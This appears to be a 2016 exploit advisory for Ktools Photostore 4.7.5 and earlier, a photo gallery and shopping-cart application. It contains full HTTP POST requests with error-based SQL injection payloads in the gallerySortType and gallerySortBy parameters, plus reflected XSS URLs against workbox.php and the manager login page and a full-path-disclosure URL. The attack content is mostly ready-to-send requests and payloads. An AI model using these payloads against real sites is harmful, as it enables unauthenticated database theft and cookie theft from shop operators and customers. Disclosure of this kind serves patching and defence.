#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-## Ktools Photostore <= 4.7.5 Multiple Vulnerabilities# Bug discovered by Yakir Wizman# Date 01/07/2016# Affected versions prior to 4.7.5# Vendor Homepage - http://www.ktools.net#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-## Author will be not responsible for any damage.#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-## About the Application:#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-## PhotoStore is a professional photo gallery & shopping cart software which contain the following basic features as described bellow:## Sell various sizes or formats of the same photo.# Sell photos, vector art, zip files and more.# Sell videos PhotoStore Pro Only# Sell prints, artwork, products, packages, digital collections and more.# Built in shopping cart and ecommerce system to accept credit cards and/or check payments.# Email notifications to both you and the customer upon purchase.# Customers can instantly download after payment.# Customers can instantly download their files after payment.# Connects to PayPal and 2Checkout.# Built in credit system to allow your customers to buy credits.# Allow your members to upload and sell their photos and other media while you take a commission.# The vulnerabilities which are described bellow does not require any legitimate user to exploit them.# The Photostore application is prone to a multiple vulnerabilities such as SQL Injection & Cross Site Scripting and does not require any legitimate user or admin privilege to exploit them.# A potentially attacker can exploit those vulnerabilities to retrieve all the data stored in the application's database (In case of SQL Injection vulnerability), Cookie Stealing / Phishing attacks (In case of Cross site scripting vulnerability).# SQL Injection (error based) Proof-Of-Concept#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-## SQL Injection (Severity is Critical)# The vulnerable parameter is “gallerySortType” which is not sanitized and sent by the user in order retrieve the gallery objects ordered by ASC or DESC in sql query.# Request Data #1 is:
POST /photostore/gallery/Objects/24/page1/ HTTP/1.1
Cache-Control: no-cache
Referer: http://www.example.net/photostore/gallery/Objects/24/page1/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0(compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Language: en-us,en;q=0.5
Host: www.ktoolsdemos.net
Cookie: PHPSESSID=3eef92499b2e80b0efae88f4d99e5ffe; cart[uniqueOrderID]=F844D7C9C7B2EA3806E501D476D3BF6E; member[umem_id]=C4A01DFEB29A64F53261C12F0F017E90;09584=eccbc87e4b5ce2fe28308fd9f2a7baf3; pass_4647=eccbc87e4b5ce2fe28308fd9f2a7baf3
Accept-Encoding: gzip, deflate
Content-Length:221
Content-Type: application/x-www-form-urlencoded
postGalleryForm=1&gallerySortBy=media_id&gallerySortType=asc,[SQL_PAYLOAD]# Inserted payload for example:
postGalleryForm=1&gallerySortBy=media_id&gallerySortType=asc,(SELECT 9713 FROM(SELECT COUNT(*),CONCAT(0x71716b6b71,(SELECT (ELT(9713=9713,1))),0x7178717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)####-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-##### The vulnerable parameter is “gallerySortBy” which is not sanitized and sent by the user in order retrieve the gallery objects selected by kind-of-type in sql query.# Request Data #2 is:
POST /photostore/gallery/Objects/24/page1/ HTTP/1.1
Cache-Control: no-cache
Referer: http://server/photostore/gallery/Objects/24/page1/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0(compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Language: en-us,en;q=0.5
Host: server
Cookie: PHPSESSID=3eef92499b2e80b0efae88f4d99e5ffe; cart[uniqueOrderID]=F844D7C9C7B2EA3806E501D476D3BF6E; member[umem_id]=C4A01DFEB29A64F53261C12F0F017E90;09584=eccbc87e4b5ce2fe28308fd9f2a7baf3; pass_4647=eccbc87e4b5ce2fe28308fd9f2a7baf3
Accept-Encoding: gzip, deflate
Content-Length:57
Content-Type: application/x-www-form-urlencoded
postGalleryForm=1&gallerySortBy=id[SQL_PAYLOAD]&gallerySortType=asc
# Inserted payload for example:
postGalleryForm=1&gallerySortBy=id AND (SELECT 7522 FROM(SELECT COUNT(*),CONCAT(0x7176787871,(SELECT (ELT(7522=7522,1))),0x716a717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&gallerySortType=asc
# Cross Site Scripting Proof—Of-Concept#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-## XSS (Severity is Medium)# The vulnerable parameter is “mediaID” in “workbox.php” file and the parameter “password” in “/mgr.login.php” file which is not sanitized and sent by the user to the application## In Order to exploit this vulnerability, the URL should be like the following examples:## http://server/photostore/workbox.php?mode=addToLightbox&mediaID=“><script>alert(/XSS/)</script># http://server/photostore/manager/mgr.login.php?username=demo&password='><script>alert("XSS")</script><input type='hidden# Full path disclosure Proof-Of-Concept#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-## FPD (Severity is low/info)# The vulnerable parameter is “photoID” in “productshot.php” file which is partially sanitized and therefor an attacker could exploit this only to full path disclosure.## In order to exploit this vulnerability, the url should be like the following example:## http://server/photostore/productshot.php?itemID=1&itemType=prod&photoID=%2f&size=125
